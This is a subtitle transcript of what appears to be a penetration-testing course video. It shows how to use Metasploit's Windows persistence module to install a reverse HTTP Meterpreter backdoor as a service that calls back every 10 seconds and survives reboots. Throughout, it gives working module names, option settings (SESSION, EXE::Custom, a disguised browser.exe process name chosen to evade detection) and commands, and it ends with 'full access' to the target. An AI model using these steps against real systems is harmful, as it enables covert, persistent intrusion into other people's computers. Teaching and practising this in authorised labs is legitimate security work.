1 1 00:00:00,350 --> 00:00:01,350 So what we're going to do 2 2 00:00:01,350 --> 00:00:04,220 is we're going to use our backdoor, 3 3 00:00:04,220 --> 00:00:07,180 the normal HTTP reverse Meterpreter backdoor 4 4 00:00:07,180 --> 00:00:09,440 that we created in the first video 5 5 00:00:09,440 --> 00:00:11,550 when we created an undetectable backdoor. 6 6 00:00:11,550 --> 00:00:14,670 We're gonna use that and inject that as a service 7 7 00:00:14,670 --> 00:00:16,610 so that it runs every time 8 8 00:00:16,610 --> 00:00:18,490 the target person runs their computer 9 9 00:00:18,490 --> 00:00:20,300 and tries to connect back to us 10 10 00:00:20,300 --> 00:00:22,730 every certain amount of time. 11 11 00:00:22,730 --> 00:00:25,360 So to do this, first of all, 12 12 00:00:25,360 --> 00:00:28,580 I'm just going to Control + C this 13 13 00:00:28,580 --> 00:00:30,850 and then I'm going to background the current session. 14 14 00:00:30,850 --> 00:00:32,290 So we've seen that before. 15 15 00:00:32,290 --> 00:00:35,230 You can do background and I can still interact 16 16 00:00:35,230 --> 00:00:37,780 with that session on number one 17 17 00:00:37,780 --> 00:00:39,873 and I'm going to use a module. 18 18 00:00:41,290 --> 00:00:43,130 So this is like the multihandler module 19 19 00:00:43,130 --> 00:00:44,760 that comes with Metasploit 20 20 00:00:44,760 --> 00:00:49,760 and it's called exploit/windows/local/persistence. 21 21 00:00:53,450 --> 00:00:54,640 Then I'm gonna show its options 22 22 00:00:54,640 --> 00:00:56,290 to see what we need to configure. 23 23 00:00:58,470 --> 00:00:59,670 So you can see here, 24 24 00:00:59,670 --> 00:01:01,490 we have similar options to what we've seen 25 25 00:01:01,490 --> 00:01:03,387 with the Metasploit service. 26 26 00:01:03,387 --> 00:01:06,040 Sot the first thing is the amount of seconds 27 27 00:01:06,040 --> 00:01:09,890 that the target will try to connect back to us. 28 28 00:01:09,890 --> 00:01:13,436 So the interval and I'm gonna keep that to 10 seconds 29 29 00:01:13,436 --> 00:01:14,980 so every 10 seconds, the target computer 30 30 00:01:14,980 --> 00:01:17,320 will try to connect back to me. 31 31 00:01:17,320 --> 00:01:19,120 Now the EXE_NAME is the name 32 32 00:01:19,120 --> 00:01:21,300 that'll show up under the processes 33 33 00:01:21,300 --> 00:01:24,290 where the connection's coming back from. 34 34 00:01:24,290 --> 00:01:27,240 So I'm gonna set that to browser 35 35 00:01:27,240 --> 00:01:29,850 to make it less detectable. 36 36 00:01:29,850 --> 00:01:32,320 So we're gonna set the EXE_NAME 37 37 00:01:32,320 --> 00:01:37,070 to browser.exe 38 38 00:01:39,840 --> 00:01:43,260 and then the path where the payload 39 39 00:01:43,260 --> 00:01:44,660 or the backdoor will be installed, 40 40 00:01:44,660 --> 00:01:46,320 I'll leave that the same. 41 41 00:01:46,320 --> 00:01:49,370 I'll leave the REG_NAME, the registry entry the same. 42 42 00:01:49,370 --> 00:01:50,760 Now this is very important. 43 43 00:01:50,760 --> 00:01:53,390 You need to specify which session 44 44 00:01:53,390 --> 00:01:55,230 to run this exploit on. 45 45 00:01:55,230 --> 00:01:56,530 And as you can see now, 46 46 00:01:56,530 --> 00:01:59,880 we were using session number one, 47 47 00:01:59,880 --> 00:02:01,920 that's our Meterpreter session 48 48 00:02:01,920 --> 00:02:05,060 and if I do sessions -l, 49 49 00:02:05,060 --> 00:02:06,810 it'll list all the available sessions 50 50 00:02:06,810 --> 00:02:09,810 and we can see that it's id number one. 51 51 00:02:09,810 --> 00:02:13,470 So what we need to do is we need to set our session here 52 52 00:02:13,470 --> 00:02:15,420 to number one. 53 53 00:02:15,420 --> 00:02:16,980 So I'm gonna do set 54 54 00:02:19,500 --> 00:02:21,623 SESSION to one. 55 55 00:02:23,880 --> 00:02:25,990 Okay and the startup, we'll gonna leave it 56 56 00:02:25,990 --> 00:02:27,620 for the user person, 57 57 00:02:27,620 --> 00:02:29,750 for the user privileges. 58 58 00:02:29,750 --> 00:02:31,223 Now, let's show the options. 59 59 00:02:36,150 --> 00:02:38,680 So browser, and the session number one. 60 60 00:02:38,680 --> 00:02:39,760 That's all good. 61 61 00:02:39,760 --> 00:02:41,320 Now, we need to do one thing 62 62 00:02:41,320 --> 00:02:42,970 which is the most important thing 63 63 00:02:43,860 --> 00:02:46,890 is to specify the payload that will be injected 64 64 00:02:46,890 --> 00:02:48,300 as a service. 65 65 00:02:48,300 --> 00:02:49,600 So to do that, 66 66 00:02:49,600 --> 00:02:53,900 we're going to do a show advanced 67 67 00:02:56,150 --> 00:02:57,500 and we haven't seen this before 68 68 00:02:57,500 --> 00:03:00,200 so every module has advanced options 69 69 00:03:00,200 --> 00:03:02,160 that we didn't have a look on before. 70 70 00:03:02,160 --> 00:03:04,560 So show advanced will show you advanced options 71 71 00:03:04,560 --> 00:03:07,980 that you can set up for this particular module. 72 72 00:03:07,980 --> 00:03:08,990 So when I run this, 73 73 00:03:08,990 --> 00:03:11,450 you'll see, I'll get so much more options 74 74 00:03:11,450 --> 00:03:13,890 and the one that we're interested in is this one 75 75 00:03:13,890 --> 00:03:16,660 so it's called EXE: Custom 76 76 00:03:16,660 --> 00:03:19,520 which means that we're going to use a customer EXE 77 77 00:03:19,520 --> 00:03:22,800 to run and inject into the target computer 78 78 00:03:22,800 --> 00:03:23,853 as a service. 79 79 00:03:24,700 --> 00:03:27,730 So I'm gonna set my EXE:: Custom 80 80 00:03:37,852 --> 00:03:42,852 to /var/www/html/backdoor.exe. 81 81 00:03:44,712 --> 00:03:48,110 As you remember, I had that running on backdoor, 82 82 00:03:48,110 --> 00:03:53,110 I had that stored in /var/www/html/backdoor.exe 83 83 00:03:53,650 --> 00:03:55,370 so I'm gonna hit Enter 84 84 00:03:55,370 --> 00:03:57,640 and I'm just gonna do show advanced again 85 85 00:03:57,640 --> 00:03:59,960 to make sure that it was set up properly 86 86 00:04:01,950 --> 00:04:03,940 'cause sometimes I misspell things 87 87 00:04:03,940 --> 00:04:06,970 and it's /var/www/html/backdoor.exe. 88 88 00:04:06,970 --> 00:04:08,090 So that's perfect. 89 89 00:04:08,090 --> 00:04:09,630 Everything is good to go. 90 90 00:04:09,630 --> 00:04:11,013 I'm gonna exploit this. 91 91 00:04:15,610 --> 00:04:20,380 And that will upload /var/www/html/backdoor.exe 92 92 00:04:20,380 --> 00:04:23,960 on the target computer using the session that we specified, 93 93 00:04:23,960 --> 00:04:24,793 session number one. 94 94 00:04:24,793 --> 00:04:26,740 As you can see now, it's been uploaded 95 95 00:04:26,740 --> 00:04:29,920 and installed and one important thing 96 96 00:04:29,920 --> 00:04:32,770 that you need to keep in mind is this resource file 97 97 00:04:32,770 --> 00:04:34,740 'cause you can use this to clean up 98 98 00:04:34,740 --> 00:04:36,590 and delete the backdoor once you're done 99 99 00:04:36,590 --> 00:04:38,410 so if you don't want the backdoor anymore 100 100 00:04:38,410 --> 00:04:39,820 on the target computer, 101 101 00:04:39,820 --> 00:04:42,910 you can use this file to delete that backdoor 102 102 00:04:42,910 --> 00:04:45,520 so I'm gonna store that in a Leafpad here 103 103 00:04:45,520 --> 00:04:49,960 so that I can run it and delete my backdoor if I wanted 104 104 00:04:49,960 --> 00:04:51,833 to delete it anytime in the future. 105 105 00:04:53,120 --> 00:04:55,363 If I do sessions -l, 106 106 00:04:56,800 --> 00:04:58,570 I still have my session here 107 107 00:04:58,570 --> 00:05:00,393 and I can interact with it. 108 108 00:05:04,850 --> 00:05:05,820 So what I'm going to do 109 109 00:05:05,820 --> 00:05:07,460 is I'm actually gonna kill that session. 110 110 00:05:07,460 --> 00:05:09,010 I'm gonna kill all my sessions. 111 111 00:05:14,680 --> 00:05:16,850 And now if I list, I have no connections 112 112 00:05:16,850 --> 00:05:19,090 with the target computer as you can see 113 113 00:05:19,090 --> 00:05:24,090 and I'm going to go to use my exploit/multi/handler, 114 114 00:05:24,800 --> 00:05:26,800 so I can listen for incoming connections 115 115 00:05:33,700 --> 00:05:36,240 and everything is configured correctly already on this. 116 116 00:05:36,240 --> 00:05:38,530 So I have my write port and my write IP. 117 117 00:05:38,530 --> 00:05:40,020 Now, if I exploit this, 118 118 00:05:40,020 --> 00:05:42,460 right now, I'll get a connection straightaway 119 119 00:05:42,460 --> 00:05:45,150 because my backdoor has been injected 120 120 00:05:45,150 --> 00:05:47,980 into the target computer on port 8080 121 121 00:05:47,980 --> 00:05:51,000 on reverse HTTP but I'm not gonna do that now, 122 122 00:05:51,000 --> 00:05:53,090 I'm actually gonna restart the target computer 123 123 00:05:53,090 --> 00:05:56,000 just to show you that I'll always have connection now 124 124 00:05:56,000 --> 00:05:57,430 with this computer. 125 125 00:05:57,430 --> 00:05:59,343 So I'm just gonna do a normal restart. 126 126 00:06:04,839 --> 00:06:07,090 So this computer will basically try to connect back 127 127 00:06:07,090 --> 00:06:08,793 to me every 10 seconds. 128 128 00:06:10,330 --> 00:06:12,130 No matter how many times they restart it, 129 129 00:06:12,130 --> 00:06:15,360 they shut it down, every time this computer is running, 130 130 00:06:15,360 --> 00:06:17,130 it'll try to connect back to me 131 131 00:06:17,130 --> 00:06:18,570 in every 10 seconds. 132 132 00:06:18,570 --> 00:06:22,150 So all I have to do is run my Meterpreter handler 133 133 00:06:22,150 --> 00:06:24,020 and wait for connections. 134 134 00:06:24,020 --> 00:06:25,790 Now, this connection's running as you can see. 135 135 00:06:25,790 --> 00:06:27,300 It doesn't have to be at the startup 136 136 00:06:27,300 --> 00:06:28,550 when I'm listening 137 137 00:06:28,550 --> 00:06:31,053 and I'm just gonna do exploit to listen. 138 138 00:06:33,260 --> 00:06:35,250 And it will take a maximum of 10 seconds 139 139 00:06:35,250 --> 00:06:36,250 to get a connection back 140 140 00:06:36,250 --> 00:06:38,100 and as you can see, I got a connection 141 141 00:06:38,100 --> 00:06:39,540 to the target computer, 142 142 00:06:39,540 --> 00:06:42,030 I go do sysinfo and run all the commands 143 143 00:06:42,030 --> 00:06:43,220 that we learned so far 144 144 00:06:43,220 --> 00:06:45,603 and have full access on that computer.